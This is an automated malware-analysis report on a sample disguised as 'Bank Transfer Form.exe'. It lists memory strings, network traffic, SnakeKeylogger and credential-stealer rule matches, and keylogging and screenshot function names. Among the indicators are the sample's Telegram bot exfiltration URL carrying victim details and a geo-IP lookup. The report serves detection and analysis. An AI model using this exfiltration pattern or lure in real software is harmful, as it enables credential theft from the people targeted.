                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20a
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003446000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.000000000338C000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003477000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.00000000032FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.00000000032FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004505000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043AF000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.000000000338C000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004553000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004629000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004368000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043B2000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004604000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.000000000433D000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.000000000450C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004505000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043AF000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.000000000338C000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004553000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004629000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004368000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043B2000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004604000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.000000000433D000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.000000000450C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003472000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Bank Transfer Form.exe, Form4.csLong String: Length: 169248
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_0114E0440_2_0114E044
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_05FAF0A90_2_05FAF0A9
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_05FA0A800_2_05FA0A80
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_05FA0A700_2_05FA0A70
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_077777120_2_07777712
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_077751700_2_07775170
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_07770A200_2_07770A20
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_077754600_2_07775460
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_077754510_2_07775451
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_0777C4380_2_0777C438
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_0777C4290_2_0777C429
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_077751600_2_07775160
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_077741F00_2_077741F0
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_077741DF0_2_077741DF
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_077741B90_2_077741B9
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_0777C0000_2_0777C000
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_0777DF180_2_0777DF18
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_07772BF80_2_07772BF8
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_07770A100_2_07770A10
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_0777C8700_2_0777C870
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_0777C8600_2_0777C860
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_0777E8480_2_0777E848
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_0F2736600_2_0F273660
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_018071183_2_01807118
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180C1473_2_0180C147
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180A0883_2_0180A088
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_018053623_2_01805362
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180D2783_2_0180D278
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180C4683_2_0180C468
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180C7383_2_0180C738
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180E9883_2_0180E988
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_018069A03_2_018069A0
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_018029E03_2_018029E0
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180CA083_2_0180CA08
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180CCD83_2_0180CCD8
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180CFAB3_2_0180CFAB
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_01803E093_2_01803E09
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180F6313_2_0180F631
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180E97B3_2_0180E97B
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_0180FA883_2_0180FA88
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F31E803_2_06F31E80
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F317A03_2_06F317A0
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F39C703_2_06F39C70
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F395483_2_06F39548
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F30B303_2_06F30B30
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F350283_2_06F35028
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F329683_2_06F32968
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3E6B03_2_06F3E6B0
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3E6AF3_2_06F3E6AF
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F31E703_2_06F31E70
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3DE003_2_06F3DE00
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3178F3_2_06F3178F
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3EF603_2_06F3EF60
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3EF513_2_06F3EF51
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3CCA03_2_06F3CCA0
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3FC683_2_06F3FC68
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F39C6D3_2_06F39C6D
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3DDFF3_2_06F3DDFF
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3D5503_2_06F3D550
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3D5403_2_06F3D540
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3EAF83_2_06F3EAF8
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3E2583_2_06F3E258
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3E2493_2_06F3E249
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3F3B83_2_06F3F3B8
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F38BA03_2_06F38BA0
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F38B903_2_06F38B90
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F30B203_2_06F30B20
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F393283_2_06F39328
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3EB083_2_06F3EB08
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3D0F83_2_06F3D0F8
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F300403_2_06F30040
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3F8103_2_06F3F810
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F350183_2_06F35018
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3F8013_2_06F3F801
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F300063_2_06F30006
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3D9A83_2_06F3D9A8
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3D9993_2_06F3D999
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F3295A3_2_06F3295A
                Source: Bank Transfer Form.exe, 00000000.00000002.1712733368.0000000003018000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exe, 00000000.00000002.1706695502.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exe, 00000000.00000002.1718802395.0000000007200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exe, 00000000.00000002.1721411415.000000000B990000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exe, 00000000.00000000.1681888470.00000000008D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBxFK.exe. vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exe, 00000003.00000002.4139170776.00000000015B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dll vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exe, 00000003.00000002.4138787902.0000000001337000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exeBinary or memory string: OriginalFilenameBxFK.exe. vs Bank Transfer Form.exe
                Source: Bank Transfer Form.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
